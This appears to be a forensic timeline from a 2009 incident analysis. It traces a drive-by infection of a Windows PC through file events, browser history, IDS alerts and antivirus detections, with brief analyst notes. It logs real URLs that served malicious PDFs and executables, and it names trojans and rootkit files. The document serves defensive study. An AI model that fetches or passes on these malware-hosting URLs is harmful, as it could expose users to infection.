RUNDLL32.EXE-71655565.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-71655565.pf02/19/09 8:24:13 written RUNDLL32.EXE-71655565.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-71655565.pf02/19/09 8:24:13 modified RUNDLL32.EXE-71655565.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-71655565.pf02/19/09 8:24:25 accessed index.dat :Host: www.co.franklin.oh.us History\Daily -02/19/09 8:24:25 accessed index.dat http://www.co.franklin.oh.us/auditor History\Daily -02/19/09 8:24:26 accessed Joseph W. Testa, Franklin County Auditor - Welcome!.urlhttp://www.co.franklin.oh.us/auditor/ Bookmarks -02/19/09 8:24:32 accessed index.dat :Host: franklincountyoh.metacama.com History\Daily -02/19/09 8:25:06 accessed index.dat http://franklincountyoh.metacama.com/do/selectDisplay?select=PHOTO&curpid=01000596400History\Daily -02/19/09 8:25:15 created [email protected][1].txtad.yieldmanager.com/ Cookies -02/19/09 8:25:20 accessed index.dat http://franklincountyoh.metacama.com/do/selectDisplay?select=GIS&curpid=01000596400History\Daily -02/19/09 8:25:27 accessed index.dat :Host: fcgis3.metacama.com History\Daily -02/19/09 8:25:27 accessed index.dat http://fcgis3.metacama.com/scripts/gis_show_parcel_info.pl?zoom=5&zmlvl=3&stype=valid&mapx=264&mapy=194&pname=283813&pid=010-005964&pick=&intersect=History\Daily -02/19/09 8:25:33 accessed index.dat http://fcgis3.metacama.com/scripts/gis_show_parcel_info.pl?zoom=5&zmlvl=5&stype=valid&mapx=264&mapy=194&pname=4922790&pid=010-005964&pick=&intersect=History\Daily -02/19/09 8:25:46 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/19895@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=24.80&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=168&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=24.80&WO3=0&WO4=68.00&Z3=43204&History\Daily -02/19/09 8:27:50 accessed index.dat http://franklincountyoh.metacama.com/altIndex.jsp History\Daily -02/19/09 8:28:09 accessed index.dat http://franklincountyoh.metacama.com/do/selectDisplay?select=PHOTO&curpid=02000088800History\Daily -02/19/09 8:28:16 accessed index.dat http://franklincountyoh.metacama.com/do/searchByAddress History\Daily -02/19/09 8:30:24 accessed RUNDLL32.EXE-71E22CD3.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-71E22CD3.pf02/19/09 8:30:24 created RUNDLL32.EXE-71E22CD3.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-71E22CD3.pf02/19/09 8:30:24 written RUNDLL32.EXE-71E22CD3.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-71E22CD3.pf02/19/09 8:30:24 modified RUNDLL32.EXE-71E22CD3.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-71E22CD3.pf02/19/09 8:52:57 accessed index.dat :Host: webcal.vip.ohio-state.edu History\Daily -02/19/09 8:53:01 created [email protected][2].txtwebcal.vip.ohio-state.edu/fcgi-bin/swc/ Cookies -02/19/09 8:53:02 accessed index.dat http://webcal.vip.ohio-state.edu/fcgi-bin/swc/lexacal.fcgi History\Daily -02/19/09 8:53:04 accessed index.dat http://webcal.vip.ohio-state.edu/fcgi-bin/swc/lexacal.fcgi?go=calendar&date=2009/2/19&utc=49984History\Daily -02/19/09 9:22:31 created smith.99999@247realmedia[1].txt247realmedia.com/ Cookies -
02/19/09 9:25:09 modified Out.mbx C:\Program Files\Qualcomm\Eudora\Out.mbx02/19/09 9:25:09 written Out.mbx C:\Program Files\Qualcomm\Eudora\Out.mbx02/19/09 9:25:29 accessed Out.mbx C:\Program Files\Qualcomm\Eudora\Out.mbx
02/19/09 9:25:43 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/1869@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=20.30&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=169&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=20.30&WO3=0&WO4=83.00&Z3=43204&History\Daily -02/19/09 9:25:44 accessed index.dat :Host: w3.brhs.org History\Daily -02/19/09 9:25:44 accessed index.dat http://w3.brhs.org History\Daily -02/19/09 9:25:45 accessed BRHS.ORG.url http://w3.brhs.org/ Bookmarks -02/19/09 9:25:49 accessed index.dat :Host: www.brhs.org History\Daily -02/19/09 9:25:49 accessed index.dat http://www.brhs.org/announcements/updatednews.htm History\Daily -
02/19/09 9:26:14 the fun (probably) starts here...02/19/09 9:26:15 created smith.99999@jjhuddle[2].txt jjhuddle.com/ Cookies -02/19/09 9:26:19 accessed index.dat :Host: www.jjhuddle.com History\Daily -
![Page 9: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/9.jpg)
02/19/09 9:26:19 accessed index.dat http://www.jjhuddle.com History\Daily -02/19/09 9:26:22 created smith.99999@infolinks[2].txt infolinks.com/ Cookies -02/19/09 9:26:50 accessed index.dat http://www.jjhuddle.com/forums/forumdisplay.php?f=306 History\Daily -02/19/09 9:27:19 accessed index.dat http://www.jjhuddle.com/forums/showthread.php?t=186381 History\Daily -02/19/09 9:27:38 accessed index.dat http://www.jjhuddle.com/forums/showthread.php?t=186381&page=3 History\Daily -02/19/09 9:27:43 created smith.99999@adbrite[1].txt adbrite.com/ Cookies -02/19/09 9:27:47 created smith.99999@crwdcntrl[2].txt crwdcntrl.net/ Cookies -02/19/09 9:27:53 created smith.99999@adbrite[1].txt adbrite.com/ Cookies -02/19/09 9:27:56 created [email protected][1].txtwww.soarnxec.net/ Cookies -
02/19/09 9:28:13 banner[1], [2].pdf are created...these both contain malware (currently not identified by virustotal)02/19/09 9:28:14 created banner[1].pdf C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\Z1NOBJL1\banner[1].pdf02/19/09 9:28:14 created banner[2].pdf C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\Z1NOBJL1\banner[2].pdf02/19/09 9:28:17 bro PDF document, version 1.4 GET http://srv.f-o-r.ms/code/document/banner?type=2&pid=15498202/19/09 9:28:17 bro PDF document, version 1.4 GET http://srv.f-o-r.ms/code/document/banner?type=1&pid=15498202/19/09 9:28:17 accessed index.dat :Host: srv.f-o-r.ms History\Daily -02/19/09 9:28:17 accessed index.dat http://srv.f-o-r.ms/code/document/banner?type=1&pid=154982 History\Daily -02/19/09 9:28:17 accessed index.dat http://srv.f-o-r.ms/code/document/banner?type=2&pid=154982 History\Daily -02/19/09 9:28:17 written banner[1].pdf C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\Z1NOBJL1\banner[1].pdf02/19/09 9:28:17 modified banner[1].pdf C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\Z1NOBJL1\banner[1].pdf02/19/09 9:28:17 accessed banner[2].pdf C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\Z1NOBJL1\banner[2].pdf02/19/09 9:28:17 written banner[2].pdf C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\Z1NOBJL1\banner[2].pdf02/19/09 9:28:17 modified banner[2].pdf C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\Z1NOBJL1\banner[2].pdf02/19/09 9:28:20 bro PDF document, version 1.4 GET http://srv.f-o-r.ms/code/document/banner?type=1&pid=15498202/19/09 9:28:42 bro MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bitGET http://f-o-r.ms/xrun.tmp
02/19/09 9:28:57 got xrun.tmp, apparently runs something called rn.tmp02/19/09 9:28:57 accessed RN.TMP-36CAACC4.pf C:\WINDOWS\Prefetch\RN.TMP-36CAACC4.pf02/19/09 9:28:57 created RN.TMP-36CAACC4.pf C:\WINDOWS\Prefetch\RN.TMP-36CAACC4.pf02/19/09 9:28:57 written RN.TMP-36CAACC4.pf C:\WINDOWS\Prefetch\RN.TMP-36CAACC4.pf02/19/09 9:28:57 modified RN.TMP-36CAACC4.pf C:\WINDOWS\Prefetch\RN.TMP-36CAACC4.pf02/19/09 9:28:57 accessed RN.TMP-36CAACC4.pf C:\WINDOWS\Prefetch\RN.TMP-36CAACC4.pf02/19/09 9:28:57 created RN.TMP-36CAACC4.pf C:\WINDOWS\Prefetch\RN.TMP-36CAACC4.pf02/19/09 9:28:57 written RN.TMP-36CAACC4.pf C:\WINDOWS\Prefetch\RN.TMP-36CAACC4.pf02/19/09 9:28:57 modified RN.TMP-36CAACC4.pf C:\WINDOWS\Prefetch\RN.TMP-36CAACC4.pf02/19/09 9:29:15 accessed banner[1].pdf C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\Z1NOBJL1\banner[1].pdf02/19/09 9:29:24 bro MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bitGET http://srv.f-o-r.ms/xrun.tmp02/19/09 9:29:29 bro application/x-dosexec GET http://srv.f-o-r.ms/xpre.tmp02/19/09 9:29:29 bro no=HTTP_IncorrectFileType na=NOTICE_ALARM_ALWAYS es=node22 sa=164.107.xxx.177 sp=1656/tcp da=85.17.162.100 dp=80/tcp method=GET url=http://srv.f-o-r.ms/xpre.tmp msg=application/x-dosexec\ GET\ http://srv.f-o-r.ms/xpre.tmp tag=@83-10576-5c7e6602/19/09 9:29:40 created smith.99999@247realmedia[1].txt247realmedia.com/ Cookies -02/19/09 9:29:40 created smith.99999@adbrite[1].txt adbrite.com/ Cookies -02/19/09 9:29:40 created smith.99999@adgardener[1].txt adgardener.com/ Cookies -02/19/09 9:29:40 created [email protected][1].txtads.imarketservices.com/ Cookies -02/19/09 9:29:40 created smith.99999@bluekai[2].txt bluekai.com/ Cookies -02/19/09 9:29:40 created smith.99999@burstnet[2].txt burstnet.com/ Cookies -02/19/09 9:29:40 created smith.99999@enhance[1].txt enhance.com/ Cookies -02/19/09 9:29:40 created [email protected][1].txtfc.webmasterpro.de/ Cookies -02/19/09 9:29:40 created [email protected][2].txtharvest99.adgardener.com/ Cookies -02/19/09 9:29:40 created smith.99999@jjhuddle[2].txt jjhuddle.com/ Cookies -02/19/09 9:29:40 created smith.99999@snap[1].txt snap.com/ Cookies -02/19/09 9:29:40 created smith.99999@traderpub[1].txt traderpub.net/ Cookies -02/19/09 9:29:40 created [email protected][2].txtwww.burstbeacon.com/ Cookies -02/19/09 9:29:40 created [email protected][1].txtwww.burstnet.com/ Cookies -02/19/09 9:29:40 created smith.99999@zedo[2].txt zedo.com/ Cookies -02/19/09 9:32:57 accessed index.dat :Host: www.myadco.net History\Daily -02/19/09 9:32:57 accessed index.dat http://www.jjhuddle.com/forums/showthread.php?t=186381&page=4 History\Daily -02/19/09 9:32:57 accessed index.dat http://www.myadco.net/sa3.php?sid=2&id=00746499d6d2aef8af&keyword=bad+credit+car+financingHistory\Daily -02/19/09 9:32:59 accessed index.dat :Host: search.zunga.com History\Daily -02/19/09 9:32:59 accessed index.dat http://search.zunga.com/?search=bad+credit+car+financing History\Daily -02/19/09 9:33:00 accessed index.dat :Host: 66.70.121.200 History\Daily -02/19/09 9:33:00 accessed index.dat http://66.70.121.200/j?sid=0wzaQ7VTHFcwJF6z History\Daily -02/19/09 9:33:02 accessed index.dat :Host: www.automart.com History\Daily -02/19/09 9:33:02 accessed index.dat http://www.automart.com/creditsearchform.php/?CMP=KNC-AskCredit&WT.srch=1&WT.mc_id=AskCreditHistory\Daily -02/19/09 9:33:20 created smith.99999@zedo[2].txt zedo.com/ Cookies -02/19/09 9:33:22 created smith.99999@rubiconproject[1].txtrubiconproject.com/ Cookies -02/19/09 9:33:22 created smith.99999@untd[2].txt untd.com/ Cookies -02/19/09 9:33:24 created smith.99999@revsci[2].txt revsci.net/ Cookies -02/19/09 9:33:25 created smith.99999@revsci[2].txt revsci.net/ Cookies -02/19/09 9:33:25 created smith.99999@specificclick[2].txt specificclick.net/ Cookies -02/19/09 9:33:26 created smith.99999@specificclick[2].txt specificclick.net/ Cookies -02/19/09 9:33:30 created [email protected][1].txtsdc.traderpub.net/ Cookies -02/19/09 9:33:31 created [email protected][2].txt at.atwola.com/ Cookies -02/19/09 9:33:33 created [email protected][2].txtehg-traderelectronicmedia.hitbox.com/ Cookies -02/19/09 9:33:33 created smith.99999@hitbox[2].txt hitbox.com/ Cookies -02/19/09 9:35:12 created smith.99999@cherylandco[2].txt cherylandco.com/ Cookies -02/19/09 9:36:50 created [email protected][1].txtfc.webmasterpro.de/ Cookies -02/19/09 9:37:46 accessed index.dat :Host: www.hswrestling.com History\Daily -02/19/09 9:37:46 accessed index.dat http://www.hswrestling.com History\Daily -
02/19/09 9:37:55 something apparently created prun.tmp, rasesnet.tmp and winvsnet.tmp, these were deleted (though prun.tmp02/19/09 9:37:56 Deleted prun.tmp C:\DOCUME~1\smith.99999\LOCALS~1\Temp\prun.tmp Generic.dx (Trojan)C:\DOCUME~1\smith.99999\LOCALS~1\Temp\xpre.tmp02/19/09 9:38:01 Deleted rasesnet.tmp C:\DOCUME~1\smith.99999\LOCALS~1\Temp\rasesnet.tmp Vundo (Trojan) C:\DOCUME~1\smith.99999\LOCALS~1\Temp\xpre.tmp02/19/09 9:38:01 Deleted winvsnet.tmp C:\DOCUME~1\smith.99999\LOCALS~1\Temp\winvsnet.tmp Generic Downloader.x (Trojan)C:\DOCUME~1\smith.99999\LOCALS~1\Temp\xpre.tmp02/19/09 9:38:22 accessed Baum's Page Wrestling.url http://www.baumspage.com/ Bookmarks -02/19/09 9:38:22 accessed index.dat :Host: www.baumspage.com History\Daily -02/19/09 9:38:22 accessed index.dat http://www.baumspage.com History\Daily -02/19/09 9:38:25 accessed index.dat http://www.baumspage.com/wr/index.htm History\Daily -02/19/09 9:38:35 accessed index.dat http://www.baumspage.com/cesect/2009/index.htm History\Daily -02/19/09 9:38:43 accessed index.dat http://www.baumspage.com/cesect/no3/brackets09.htm History\Daily -02/19/09 9:38:55 accessed index.dat http://www.baumspage.com/cesect/no3/entrygrd.htm History\Daily -02/19/09 9:39:06 accessed index.dat http://www.baumspage.com/new_system/default.asp History\Daily -02/19/09 9:39:10 accessed index.dat http://www.baumspage.com/cesect/no3/index.htm History\Daily -02/19/09 9:43:59 created smith.99999@135484[2].txt 135484.com/ Cookies -02/19/09 9:43:59 created [email protected][1].txt4509.01.blueseek.com/ Cookies -02/19/09 9:43:59 created [email protected][1].txt 64.111.196.117/ Cookies -02/19/09 9:43:59 created [email protected][1].txt6478.21.primosearch.com/ Cookies -02/19/09 9:43:59 created [email protected][1].txt 66.221.37.124/ Cookies -02/19/09 9:43:59 created [email protected][1].txt 66.230.188.67/ Cookies -02/19/09 9:43:59 created [email protected][1].txt 74.53.99.54/ Cookies -02/19/09 9:43:59 created [email protected][2].txt 74.53.99.55/ Cookies -02/19/09 9:43:59 created [email protected][1].txtad.yieldmanager.com/ Cookies -02/19/09 9:43:59 created smith.99999@adtrafficsolution[1].txtadtrafficsolution.com/ Cookies -02/19/09 9:43:59 created [email protected][1].txtatd.agencytradingdesk.net/ Cookies -02/19/09 9:43:59 created smith.99999@bizcash[1].txt bizcash.info/go/ Cookies -02/19/09 9:43:59 created smith.99999@contextweb[2].txt contextweb.com/ Cookies -02/19/09 9:43:59 created [email protected][1].txtfc.webmasterpro.de/ Cookies -02/19/09 9:43:59 created smith.99999@klickup[1].txt klickup.com/ Cookies -02/19/09 9:43:59 created [email protected][1].txt klite.ath.cx/ Cookies -02/19/09 9:43:59 created [email protected][1].txtload.exelator.com/load/ Cookies -02/19/09 9:43:59 created [email protected][2].txtmedia.mtvnservices.com/ Cookies -02/19/09 9:43:59 created smith.99999@mygeek[2].txt mygeek.com/ Cookies -02/19/09 9:43:59 created smith.99999@myroitracking[2].txtmyroitracking.com/ Cookies -02/19/09 9:43:59 created smith.99999@primetrafficsite[1].txtprimetrafficsite.com/go/ Cookies -02/19/09 9:43:59 created smith.99999@redirectfor-me[2].txt Cookies -
![Page 10: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/10.jpg)
02/19/09 9:43:59 created smith.99999@sportgfx[2].txt sportgfx.com/ Cookies -02/19/09 9:43:59 created smith.99999@statcounter[2].txt statcounter.com/ Cookies -02/19/09 9:43:59 created [email protected][2].txttag.contextweb.com/ Cookies -02/19/09 9:43:59 created smith.99999@thedailyshow[1].txtthedailyshow.com/ Cookies -02/19/09 9:43:59 created [email protected][2].txtwatches.revone.biz/ Cookies -02/19/09 9:43:59 created smith.99999@wmvmedialease[1].txtwmvmedialease.com/ Cookies -02/19/09 9:43:59 created [email protected][1].txtwww.abcjmp.com/ Cookies -02/19/09 9:43:59 created [email protected][2].txtwww.advertising365.com/ats/ Cookies -02/19/09 9:43:59 created [email protected][2].txtwww.advertyz.com/ Cookies -02/19/09 9:43:59 created [email protected][1].txtwww.fxopen.com/ Cookies -02/19/09 9:43:59 created [email protected][1].txtwww.investorsconsumergoods.com/ Cookies -02/19/09 9:43:59 created [email protected][2].txtwww.investorsconsumerservices.com/ Cookies -02/19/09 9:43:59 created [email protected][2].txtwww.investorsenergystocks.com/ Cookies -02/19/09 9:43:59 created [email protected][2].txtwww.investorsfinancials.com/ Cookies -02/19/09 9:43:59 created [email protected][2].txtwww.investorshealthcare.com/ Cookies -02/19/09 9:43:59 created [email protected][1].txtwww.ncmfinancial.com/ Cookies -02/19/09 9:43:59 created [email protected][1].txtwww.popunderserver.net/ Cookies -02/19/09 9:43:59 created [email protected][1].txtwww.primetrafficsite.com/go/ Cookies -02/19/09 9:43:59 created [email protected][1].txt xyz.freelogs.com/ Cookies -02/19/09 9:43:59 created [email protected][1].txtyellowpages.addresses.com/ Cookies -02/19/09 9:43:59 created [email protected][2].txtyellowpagescom.addresses.com/ Cookies -
02/19/09 9:44:07 more bad stuff is created, run...mcafee finds what would appear to be a by-product...02/19/09 9:44:08 created prunnet.exe C:\\WINDOWS\SYSTEM32\prunnet.exe Windows Executable Code\Executable Match File, Archive02/19/09 9:44:08 written prunnet.exe C:\\WINDOWS\SYSTEM32\prunnet.exe Windows Executable Code\Executable Match File, Archive02/19/09 9:44:24 created PRUNNET.EXE-18A96408.pf C:\WINDOWS\Prefetch\PRUNNET.EXE-18A96408.pf02/19/09 9:44:24 created PRUNNET.EXE-18A96408.pf C:\WINDOWS\Prefetch\PRUNNET.EXE-18A96408.pf02/19/09 9:44:33 Cleaned ecomsnraxw.tmp C:\DOCUME~1\smith.99999\LOCALS~1\Temp\ecomsnraxw.tmp W32/Virut.n.gen (Virus)C:\WINDOWS\system32\mshta.exe02/19/09 9:44:37 bro application/x-dosexec GET http://childhe.com/pas/apstpldr.dll.html?affid=177047&uid=&guid=D294B3372EFC4D4CA6C6DDD12F79C20A02/19/09 9:44:38 bro
02/19/09 9:44:48 the seneka rootkit...02/19/09 9:44:49 created senekalhtijurw.sys C:\\WINDOWS\SYSTEM32\DRIVERS\senekalhtijurw.sys Device Driver Code\Executable Match File, Archive02/19/09 9:44:49 written senekalhtijurw.sys C:\\WINDOWS\SYSTEM32\DRIVERS\senekalhtijurw.sys Device Driver Code\Executable Match File, Archive02/19/09 9:44:57 Deleted wcenoxarms.tmp C:\DOCUME~1\smith.99999\LOCALS~1\Temp\wcenoxarms.tmp Generic Downloader.x (Trojan)C:\WINDOWS\system32\mshta.exe02/19/09 9:45:00 created senekafqqjlktq.dll C:\\WINDOWS\SYSTEM32\senekafqqjlktq.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:45:00 modified senekalhtijurw.sys C:\\WINDOWS\SYSTEM32\DRIVERS\senekalhtijurw.sys Device Driver Code\Executable Match File, Archive
02/19/09 9:45:01 ????02/19/09 9:45:02 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service was successfully sent a start control. -02/19/09 9:45:02 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service entered the running state. -02/19/09 9:45:02 logged SysEvent.Evt EVENT ID: 7034 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service terminated unexpectedly. It has done this 1 time(s). -02/19/09 9:45:03 created senekalwbrsnty.dat C:\\WINDOWS\SYSTEM32\senekalwbrsnty.dat Data ASCII & Binary Code\Library ! Bad signature File, Archive02/19/09 9:45:05 accessed senekakxidursb.dll C:\\WINDOWS\SYSTEM32\senekakxidursb.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:45:05 created senekakxidursb.dll C:\\WINDOWS\SYSTEM32\senekakxidursb.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:45:05 created senekarxltpsnr.dll C:\\WINDOWS\SYSTEM32\senekarxltpsnr.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:45:05 modified senekakxidursb.dll C:\\WINDOWS\SYSTEM32\senekakxidursb.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:45:05 modified senekarxltpsnr.dll C:\\WINDOWS\SYSTEM32\senekarxltpsnr.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:45:05 written senekakxidursb.dll C:\\WINDOWS\SYSTEM32\senekakxidursb.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:45:05 written senekarxltpsnr.dll C:\\WINDOWS\SYSTEM32\senekarxltpsnr.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:45:10 created winsinstall.exe C:\\Documents and Settings\smith.99999\Local Settings\Temp\winsinstall.exe Windows Executable Code\Executable Match File, Archive02/19/09 9:45:12 accessed winsinstall.exe C:\\Documents and Settings\smith.99999\Local Settings\Temp\winsinstall.exe Windows Executable Code\Executable Match File, Archive02/19/09 9:45:12 written winsinstall.exe C:\\Documents and Settings\smith.99999\Local Settings\Temp\winsinstall.exe Windows Executable Code\Executable Match File, Archive02/19/09 9:45:13 bro application/x-dosexec GET http://rs263tg.rapidshare.com/files/198761582/winsinstall.exe02/19/09 9:45:15 accessed SSSInstaller.dll C:\\Documents and Settings\smith.99999\Local Settings\Temp\SSSInstaller.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:45:28 modified winsinstall.exe C:\\Documents and Settings\smith.99999\Local Settings\Temp\winsinstall.exe Windows Executable Code\Executable Match File, Archive02/19/09 9:46:01 Will be deleted after the next reboot (Clean failed) apstpldr.dll[1].htm C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\QXLU2P44\apstpldr.dll[1].htmVundo (Trojan) C:\WINDOWS\Explorer.EXE02/19/09 9:46:10 accessed index.dat :Host: klite.ath.cx History\Daily -02/19/09 9:46:11 accessed index.dat :Host: saledirectwarehouse.com History\Daily -02/19/09 9:46:11 accessed index.dat http://saledirectwarehouse.com/traffic.php History\Daily -02/19/09 9:46:27 accessed index.dat :Host: www.globoengine.com History\Daily -02/19/09 9:46:27 accessed index.dat http://www.globoengine.com/search_results.php?keyword=lung cancer&ref=48453History\Daily -02/19/09 9:46:30 accessed index.dat :Host: www.abcjmp.com History\Daily -02/19/09 9:46:30 accessed index.dat http://www.abcjmp.com/jump2/?affiliate=netzter2&subid=01&terms=mortgage loan refinanceHistory\Daily -02/19/09 9:46:34 accessed index.dat http://www.abcjmp.com/jump2/?affiliate=calgonite&subid=01&terms=build credit cardsHistory\Daily -02/19/09 9:46:38 accessed index.dat :Host: www.searchfeed.com History\Daily -02/19/09 9:46:38 accessed index.dat http://www.searchfeed.com/rd/Clk.jsp?s=ap&hu=1&k=lung+cancer&lnk2=rhhE?..4L68'G9'ExsBDyekxpr'pDB.ziBE9.>kffsAskhe=ML88)yiosq=8GG1M)hexBy=AiCg#G2pkCpex)ysq=Z2682LH1M8#L2buV2bdNubuNfJdNt8ANt8cO28TOLpdN9KRNumRF)k=fyx5f|2'282&p=82295&sid=256415&ex=1235054799525&snid=65History\Daily -02/19/09 9:46:40 accessed index.dat :Host: www.thedailyshow.com History\Daily -02/19/09 9:46:40 accessed index.dat http://www.thedailyshow.com/video/index.jhtml?videoId=210190&title=Bill-O'Reilly-Pt.-1&tag=HTLF_generic&itemId=218531History\Daily -02/19/09 9:46:41 accessed index.dat :Host: 6478.21.primosearch.com History\Daily -02/19/09 9:46:41 accessed index.dat http://6478.21.primosearch.com/jump1/?affiliate=5488&subid=82295&terms=lung cancer&sid=Z078043958@EzX0EDNzEzNfRDNy8lNy8FO08VO4cDN1ATNzITM&a=fsrqfHistory\Daily -02/19/09 9:46:42 accessed index.dat http://6478.21.primosearch.com/jump2/?affiliate=5488&subid=82295&terms=lung cancerHistory\Daily -02/19/09 9:46:44 accessed index.dat :Host: www.primosearch.com History\Daily -02/19/09 9:46:44 accessed index.dat http://www.primosearch.com/cgi-bin/search.cgi?affiliate=index0001&subid=82295&terms=lung cancerHistory\Daily -02/19/09 9:47:12 accessed index.dat :Host: www.fxopen.com History\Daily -02/19/09 9:47:20 created prun.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\prun.tmp Windows Temporary Windows * Executable File, Archive02/19/09 9:47:20 modified prun.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\prun.tmp Windows Temporary Windows * Executable File, Archive02/19/09 9:47:20 written prun.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\prun.tmp Windows Temporary Windows * Executable File, Archive02/19/09 9:47:28 created geBtSIyX.dll C:\\WINDOWS\SYSTEM32\geBtSIyX.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:47:28 modified geBtSIyX.dll C:\\WINDOWS\SYSTEM32\geBtSIyX.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:47:28 written geBtSIyX.dll C:\\WINDOWS\SYSTEM32\geBtSIyX.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:47:32 created ssqQkHBq.dll C:\\WINDOWS\SYSTEM32\ssqQkHBq.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:47:32 modified ssqQkHBq.dll C:\\WINDOWS\SYSTEM32\ssqQkHBq.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:47:32 written ssqQkHBq.dll C:\\WINDOWS\SYSTEM32\ssqQkHBq.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:47:33 accessed index.dat http://www.fxopen.com History\Daily -02/19/09 9:47:35 created fccbAQkj.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\fccbAQkj.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive02/19/09 9:47:35 created qoMfdaYs.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\qoMfdaYs.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive02/19/09 9:47:35 modified fccbAQkj.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\fccbAQkj.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive02/19/09 9:47:35 modified qoMfdaYs.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\qoMfdaYs.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive02/19/09 9:47:35 written fccbAQkj.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\fccbAQkj.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive02/19/09 9:47:35 written qoMfdaYs.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\qoMfdaYs.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive02/19/09 9:47:36 accessed fccbAQkj.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\fccbAQkj.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive02/19/09 9:47:36 accessed qoMfdaYs.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\qoMfdaYs.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive
02/19/09 9:47:43 explorer.exe error?02/19/09 9:47:44 logged SysEvent.Evt EVENT ID: 26 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Application popup: Explorer.EXE - Application Error : The instruction at "0x03cd62c8" referenced memory at "0x03cd62c8". The memory could not be "read".;;Click on OK to terminate the program;Click on CANCEL to debug the program-02/19/09 9:47:46 bro application/x-dosexec GET http://rs263cg.rapidshare.com/files/198761582/winsinstall.exe02/19/09 9:47:46 bro application/x-dosexec GET http://rs263l32.rapidshare.com/files/198761582/winsinstall.exe02/19/09 9:47:51 logged SysEvent.Evt EVENT ID: 26 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Application popup: IEXPLORE.EXE - Application Error : The instruction at "0x76f2345a" referenced memory at "0x76f2345a". The memory could not be "read".;;Click on OK to terminate the program;Click on CANCEL to debug the 